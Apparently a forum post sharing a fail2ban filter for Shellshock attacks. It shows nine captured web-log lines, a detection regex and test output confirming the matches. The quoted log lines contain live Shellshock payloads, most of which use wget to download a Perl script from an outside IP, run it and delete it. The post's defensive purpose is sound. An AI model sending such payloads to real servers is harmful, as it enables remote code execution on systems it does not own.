9 samples in /var/log/test.log
Code: Select all
89.207.135.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 401 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/info.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /test HTTP/1.0" 404 389 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php5 HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
Code: Select all
[Definition]
docroot = /var/www/html
failregex = failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+
ignoreregex =
Testing:
Code: Select all
fail2ban-regex /var/log/test.log /etc/fail2ban/filter.d/shellshock.conf
Code: Select all
Summary
=======
Addresses found:
[1]
89.207.135.125 (Thu Sep 25 04:14:19 2014)
198.20.69.74 (Thu Sep 25 17:42:32 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
Date template hits:
18 hit(s): Day/MONTH/Year:Hour:Minute:Second
Success, the total number of match is 9
Enjoy the Goodness!